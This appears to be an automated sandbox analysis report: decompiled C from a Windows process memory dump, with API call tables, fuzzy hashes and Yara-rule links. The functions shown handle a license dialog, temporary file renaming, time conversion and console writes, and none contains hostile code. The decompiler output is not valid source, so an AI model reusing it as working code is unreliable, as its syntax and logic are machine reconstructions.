                0x00ca22bc
                0x00ca22be
                0x00ca22c6
                0x00ca22cc
                0x00ca22d9
                0x00ca22de
                0x00ca22de
                0x00ca22f4
                0x00ca22f9
                0x00ca2304
                0x00ca230c
                0x00ca230d
                0x00000000
                0x00ca230d
                0x00ca2195
                0x00ca2198
                0x00ca21d7
                0x00ca21de
                0x00ca21e5
                0x00ca21ee
                0x00ca21fc
                0x00ca2202
                0x00ca2209
                0x00ca220d
                0x00ca220f
                0x00ca2218
                0x00ca221f
                0x00ca2221
                0x00ca2223
                0x00ca2223
                0x00ca2229
                0x00ca222e
                0x00ca2232
                0x00ca2232
                0x00ca2236
                0x00ca2238
                0x00ca2241
                0x00ca2248
                0x00ca224a
                0x00ca224c
                0x00ca224c
                0x00ca224f
                0x00ca2258
                0x00ca225d
                0x00ca225d
                0x00ca2261
                0x00ca2268
                0x00ca2271
                0x00ca2271
                0x00ca2277
                0x00ca227e
                0x00ca2287
                0x00ca2287
                0x00ca228d
                0x00000000
                0x00ca228d
                0x00ca219d
                0x00000000
                0x00000000
                0x00ca21a7
                0x00ca21b5
                0x00ca21b5
                0x00ca21b8
                0x00ca21c1
                0x00ca21c6
                0x00ca21c7
                0x00000000
                0x00ca21c7
                0x00ca2670
                0x00ca2670
                0x00ca2670
                0x00ca2674
                0x00ca267a
                0x00ca267f
                0x00000000
                0x00000000
                0x00000000
                0x00ca267f
                0x00ca2149
                0x00ca20a9
                0x00ca207a
                0x00ca2687

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: ;%u$x%u$xc%u
                • API String ID: 0-2277559157
                • Opcode ID: eff44e84dcd4eb0abe0182e2e9cd87d245a28fcc624abb1096fa0f50b28b9d6c
                • Instruction ID: 00998b89f3c6e6319a80e1e678c2286b4b7308545d509b02ac2823e1296ff2f7
                • Opcode Fuzzy Hash: eff44e84dcd4eb0abe0182e2e9cd87d245a28fcc624abb1096fa0f50b28b9d6c
                • Instruction Fuzzy Hash: D3F198306053534BDF24EF2C8895BFE77A9AF96308F084579FD858B283CA20C944E762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBA3E1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E00CBA3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				intOrPtr _t31;
				struct HWND__* _t35;
				intOrPtr _t36;
				void* _t37;
				struct HWND__* _t38;

				_t28 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				if(E00CA12D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t37 = _t36 - 0x110;
				if(_t37 == 0) {
					E00CBC343(__edx, __eflags, __fp0, _t35);
					_t9 =  *0xceb704;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t35, 0x80, 1, _t9);
					}
					_t10 =  *0xcf5d04;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xcfde1c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t35, _t11);
					}
					_t38 = GetDlgItem(_t35, 0x65);
					SendMessageW(_t38, 0x435, 0, 0x10000);
					SendMessageW(_t38, 0x443, 0,  *0xcddf40(0xf));
					 *0xcddf3c(_t35);
					_t31 =  *0xce75ec; // 0x0
					E00CB8FE6(_t31, __eflags,  *0xce0064, _t38,  *0xcfde18, 0, 0);
					L00CC2B4E( *0xcfde1c);
					L00CC2B4E( *0xcfde18);
					goto L16;
				}
				if(_t37 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t35, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}













                0x00cba3e2
                0x00cba3e8
                0x00cba3ef
                0x00cba408
                0x00cba4ee
                0x00cba4f0
                0x00000000
                0x00cba4f0
                0x00cba40e
                0x00cba414
                0x00cba441
                0x00cba446
                0x00cba451
                0x00cba453
                0x00cba45e
                0x00cba45e
                0x00cba460
                0x00cba465
                0x00cba467
                0x00cba473
                0x00cba473
                0x00cba479
                0x00cba47e
                0x00cba480
                0x00cba484
                0x00cba484
                0x00cba499
                0x00cba4a1
                0x00cba4b3
                0x00cba4b6
                0x00cba4bc
                0x00cba4d1
                0x00cba4dc
                0x00cba4e7
                0x00000000
                0x00cba4ed
                0x00cba419
                0x00cba428
                0x00000000
                0x00cba428
                0x00cba41e
                0x00cba421
                0x00cba43c
                0x00cba430
                0x00cba431
                0x00000000
                0x00cba431
                0x00cba426
                0x00cba42f
                0x00000000
                0x00cba42f
                0x00000000

                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • EndDialog.USER32(?,00000001), ref: 00CBA431
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBA45E
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CBA473
                • SetWindowTextW.USER32(?,?), ref: 00CBA484
                • GetDlgItem.USER32(?,00000065), ref: 00CBA48D
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CBA4A1
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CBA4B3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: 2282b7de93555961b0b4331dc1707d65fd4b85d9323796ce0722be098d5f5cda
                • Instruction ID: 797a205f2b59c8aaa6ed9407cdf628309581479f6b5f4e983b68f651f71d997d
                • Opcode Fuzzy Hash: 2282b7de93555961b0b4331dc1707d65fd4b85d9323796ce0722be098d5f5cda
                • Instruction Fuzzy Hash: DE21D6326452047BE2115F75ED8DFBF7B6DEB46B85F014015F682E61A0CBA2ED01DA32
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9268, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00CA9268(void* __ecx) {
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t82;
				WCHAR* _t83;
				void* _t85;
				void* _t87;

				E00CBD870(E00CD1336, _t85);
				E00CBD940();
				_t83 =  *(_t85 + 8);
				_t31 = _t85 - 0x4030;
				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t92 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *(_t85 + 8) = E00CAB943(_t92, _t85 - 0x4030);
							_t78 = E00CAB943(_t92, _t85 - 0x5030);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00CB1410( *(_t85 + 8), _t78);
								_t94 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00CB1410(E00CAB943(_t94, _t83), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t85 - 0x100c) = _t41;
										_t79 = 0;
										while(1) {
											_t96 = _t41;
											if(_t41 != 0) {
												break;
											}
											E00CAFAB1(_t85 - 0x100c, _t83, 0x800);
											E00CA3E41(E00CAB943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
											_t87 = _t87 + 0x10;
											if(E00CA9E6B(_t85 - 0x100c) == 0) {
												_t41 =  *(_t85 - 0x100c);
											} else {
												_t41 = 0;
												 *(_t85 - 0x100c) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t99 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00CAFAB1(_t85 - 0x3030, _t83, 0x800);
										_push(0x800);
										E00CAB9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
											goto L20;
										} else {
											E00CA943C(_t85 - 0x2030);
											 *((intOrPtr*)(_t85 - 4)) = _t68;
											if(E00CA9E6B(_t83) == 0) {
												_push(0x12);
												_push(_t83);
												_t68 = E00CA9528(_t85 - 0x2030);
											}
											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
											if(_t68 != 0) {
												E00CA94DA(_t85 - 0x2030);
												E00CA9621(_t85 - 0x2030);
											}
											E00CA946E(_t85 - 0x2030);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t32;
			}
















                0x00ca926d
                0x00ca9277
                0x00ca927e
                0x00ca9281
                0x00ca9290
                0x00ca9298
                0x00ca9427
                0x00ca9427
                0x00ca9427
                0x00ca92a6
                0x00ca92af
                0x00ca92b7
                0x00000000
                0x00ca92bd
                0x00ca92bd
                0x00ca92bf
                0x00000000
                0x00ca92c5
                0x00ca92d1
                0x00ca92e0
                0x00ca92e2
                0x00ca92e7
                0x00000000
                0x00ca92ed
                0x00ca92f1
                0x00ca92f6
                0x00ca92f8
                0x00000000
                0x00ca92fe
                0x00ca9306
                0x00ca930d
                0x00000000
                0x00ca9313
                0x00ca9313
                0x00ca931a
                0x00ca931c
                0x00ca931c
                0x00ca931f
                0x00000000
                0x00000000
                0x00ca932e
                0x00ca934b
                0x00ca9350
                0x00ca9361
                0x00ca936e
                0x00ca9363
                0x00ca9363
                0x00ca9365
                0x00ca9365
                0x00ca9375
                0x00ca937e
                0x00000000
                0x00ca9380
                0x00ca9380
                0x00ca9383
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ca9383
                0x00000000
                0x00ca937e
                0x00ca9397
                0x00ca939c
                0x00ca93a7
                0x00ca93c4
                0x00000000
                0x00ca93c6
                0x00ca93cc
                0x00ca93d2
                0x00ca93dc
                0x00ca93de
                0x00ca93e0
                0x00ca93ec
                0x00ca93ec
                0x00ca93fc
                0x00ca9400
                0x00ca9408
                0x00ca9413
                0x00ca9413
                0x00ca941e
                0x00ca9423
                0x00ca9423
                0x00ca93c4
                0x00ca930d
                0x00ca92f8
                0x00ca92e7
                0x00ca92bf
                0x00ca92b7
                0x00ca9429
                0x00ca942f
                0x00ca9439

                APIs
                • __EH_prolog.LIBCMT ref: 00CA926D
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CA9290
                • GetShortPathNameW.KERNEL32 ref: 00CA92AF
                  • Part of subcall function 00CB1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00CAACFE,?,?,?,00CAACAD,?,-00000002,?,00000000,?), ref: 00CB1426
                • _swprintf.LIBCMT ref: 00CA934B
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • MoveFileW.KERNEL32(?,?), ref: 00CA93C0
                • MoveFileW.KERNEL32(?,?), ref: 00CA93FC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                • String ID: rtmp%d
                • API String ID: 2111052971-3303766350
                • Opcode ID: f6c3ae0e846af57be5494917926d4bee977f2d9c46c88bbe4c005cd87bd9bcc4
                • Instruction ID: 458a8a57c1c21cc2467d2ed31b0314949dfc20a32da08e393699fff6ef77638c
                • Opcode Fuzzy Hash: f6c3ae0e846af57be5494917926d4bee977f2d9c46c88bbe4c005cd87bd9bcc4
                • Instruction Fuzzy Hash: 9041A0B581111AA6CF20EBA0CC46FEE737CEF4A389F0444A5B605A3052EA34DF45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB06E0, Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00CB06E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t92;
				signed int _t94;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E00CBDEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E00CAA995() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebp");
					asm("adc ecx, ebp");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebp");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t92 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t94 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t92[3] = _v48.wHour & 0x0000ffff;
				_t92[4] = _v48.wMinute & 0x0000ffff;
				_t92[5] = _v48.wSecond & 0x0000ffff;
				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t92 = _v48.wYear & 0x0000ffff;
				_t92[1] = _t94;
				_t92[2] = _t85;
				_t92[8] = _t85 - 1;
				if(_t94 > 1) {
					_t89 = 0xcdd084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t92[8] = _t92[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t94) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t94 > 2 && E00CB0849(_t88) != 0) {
					_t92[8] = _t92[8] + 1;
				}
				_t73 = E00CBDF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t92[6] = _t73;
				return _t73;
			}




















                0x00cb06e0
                0x00cb06e7
                0x00cb06f8
                0x00cb06fc
                0x00cb0710
                0x00cb072e
                0x00cb073b
                0x00cb0751
                0x00cb075d
                0x00cb076b
                0x00cb0773
                0x00cb0779
                0x00cb077f
                0x00cb0783
                0x00cb0785
                0x00cb0712
                0x00cb071c
                0x00cb071c
                0x00cb0793
                0x00cb0795
                0x00cb07a0
                0x00cb07a1
                0x00cb07a6
                0x00cb07ab
                0x00cb07b0
                0x00cb07b8
                0x00cb07c0
                0x00cb07c8
                0x00cb07ce
                0x00cb07d0
                0x00cb07d3
                0x00cb07d6
                0x00cb07db
                0x00cb07df
                0x00cb07e4
                0x00cb07e5
                0x00cb07ec
                0x00cb07ef
                0x00cb07f2
                0x00cb07f5
                0x00cb07f8
                0x00000000
                0x00000000
                0x00000000
                0x00cb07f8
                0x00cb07fa
                0x00cb07fa
                0x00cb0802
                0x00cb080e
                0x00cb080e
                0x00cb081d
                0x00cb0823
                0x00cb082c

                APIs
                • __aulldiv.LIBCMT ref: 00CB06F3
                  • Part of subcall function 00CAA995: GetVersionExW.KERNEL32(?), ref: 00CAA9BA
                • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00CB071C
                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00CB072E
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CB073B
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB0751
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB075D
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CB0793
                • __aullrem.LIBCMT ref: 00CB081D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: 354dcab87a61752574d0d6b8543cd498c13c1d571660e8034443419c44ce8d60
                • Instruction ID: 50488f794caad5e280fc9a7589892114ef95ab98ea79f7a6ed0161862d54f2bd
                • Opcode Fuzzy Hash: 354dcab87a61752574d0d6b8543cd498c13c1d571660e8034443419c44ce8d60
                • Instruction Fuzzy Hash: 6C4117B24083059FC710DF65C880AAFF7E8FF88714F104A2EF69692250EB35E648DB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCE2ED, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E00CCE2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xcdd668; // 0x814d2927
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xd00420 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xd00420 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00CC9474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xd00420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xd00420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xd00420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00CC804C( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00CC804C();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00CBE203(_t135, _v8 ^ _t136);
			}


































                0x00cce2f5
                0x00cce2fc
                0x00cce2ff
                0x00cce307
                0x00cce30b
                0x00cce317
                0x00cce31a
                0x00cce31d
                0x00cce324
                0x00cce32c
                0x00cce32f
                0x00cce335
                0x00cce33b
                0x00cce340
                0x00cce342
                0x00cce345
                0x00cce34a
                0x00cce354
                0x00cce35b
                0x00cce35e
                0x00cce365
                0x00cce36c
                0x00cce398
                0x00cce3be
                0x00cce3c0
                0x00000000
                0x00cce39a
                0x00cce39d
                0x00cce464
                0x00cce470
                0x00cce47b
                0x00cce480
                0x00cce3a3
                0x00cce3aa
                0x00cce3af
                0x00cce3b5
                0x00cce3bb
                0x00000000
                0x00cce3bb
                0x00cce3b5
                0x00cce39d
                0x00cce36e
                0x00cce372
                0x00cce375
                0x00cce37b
                0x00cce37d
                0x00cce380
                0x00cce384
                0x00cce3c1
                0x00cce3c4
                0x00cce3c5
                0x00cce3ca
                0x00cce3d0
                0x00cce3d6
                0x00cce3e5
                0x00cce3eb
                0x00cce3f1
                0x00cce3f6
                0x00cce412
                0x00cce485
                0x00cce48b
                0x00cce414
                0x00cce414
                0x00cce41c
                0x00cce425
                0x00cce42b
                0x00000000
                0x00cce42d
                0x00cce42f
                0x00cce432
                0x00cce44b
                0x00000000
                0x00cce44d
                0x00cce451
                0x00cce453
                0x00cce456
                0x00000000
                0x00cce456
                0x00cce451
                0x00cce44b
                0x00cce42b
                0x00cce425
                0x00cce412
                0x00cce3f6
                0x00cce3d0
                0x00000000
                0x00cce459
                0x00cce459
                0x00cce48d
                0x00cce49f

                APIs
                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CCEA62,00000000,00000000,00000000,00000000,00000000,00CC3FBF), ref: 00CCE32F
                • __fassign.LIBCMT ref: 00CCE3AA
                • __fassign.LIBCMT ref: 00CCE3C5
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CCE3EB
                • WriteFile.KERNEL32(?,00000000,00000000,00CCEA62,00000000,?,?,?,?,?,?,?,?,?,00CCEA62,00000000), ref: 00CCE40A
                • WriteFile.KERNEL32(?,00000000,00000001,00CCEA62,00000000,?,?,?,?,?,?,?,?,?,00CCEA62,00000000), ref: 00CCE443
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: fdafed9cbb14affce3583e1f53f9df8998e720b2a45836152a963cd023ab35dc
                • Instruction ID: 68eb27a30098725424376e680d436ea308849f9bb4aaa393c9bbfd0f548b6275
                • Opcode Fuzzy Hash: fdafed9cbb14affce3583e1f53f9df8998e720b2a45836152a963cd023ab35dc
                • Instruction Fuzzy Hash: 1C5182B1A00249AFDB14CFA8D885FEEBBF9EF09310F14415EE555E7291D730AA41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBBB5B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                Download Yara Rule
                C-Code - Quality: 52%
                			E00CBBB5B(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t209;
				void* _t210;
				intOrPtr _t263;
				WCHAR* _t277;
				void* _t279;
				WCHAR* _t280;
				void* _t285;

				L0:
				while(1) {
					L0:
					_t263 = __ebx;
					if(__ebx != 1) {
						goto L112;
					}
					L96:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E00CAAEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L98:
						_push( *0xcdd5f8);
						__ebp - 0x7c84 = E00CA3E41(0xce85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E00CA9E6B(0xce85fa);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L97:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L99:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xce85fa);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L164:
							_push(0x1000);
							_t197 = _t285 - 0xe; // 0xffffa36e
							_t198 = _t285 - 0xd; // 0xffffa36f
							_t199 = _t285 - 0x5c84; // 0xffff46f8
							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t285 + 0xc)));
							_t209 = E00CBA156();
							_t263 =  *((intOrPtr*)(_t285 + 0x10));
							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
							if(_t209 != 0) {
								_t210 = _t285 - 0x5c84;
								_t279 = _t285 - 0x1bc8c;
								_t277 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00CB1410(_t285 - 0xfc8c,  *((intOrPtr*)(0xcdd618 + _t280 * 4))) != 0) {
								_t280 =  &(_t280[0]);
								if(_t280 < 0xe) {
									continue;
								} else {
									goto L164;
								}
							}
							__eflags = _t280 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t280 * 4 +  &M00CBC0D7))) {
								case 0:
									L9:
									__eflags = _t263 - 2;
									if(_t263 != 2) {
										goto L164;
									}
									L10:
									_t282 = 0x800;
									E00CB95F8(_t285 - 0x7c84, 0x800);
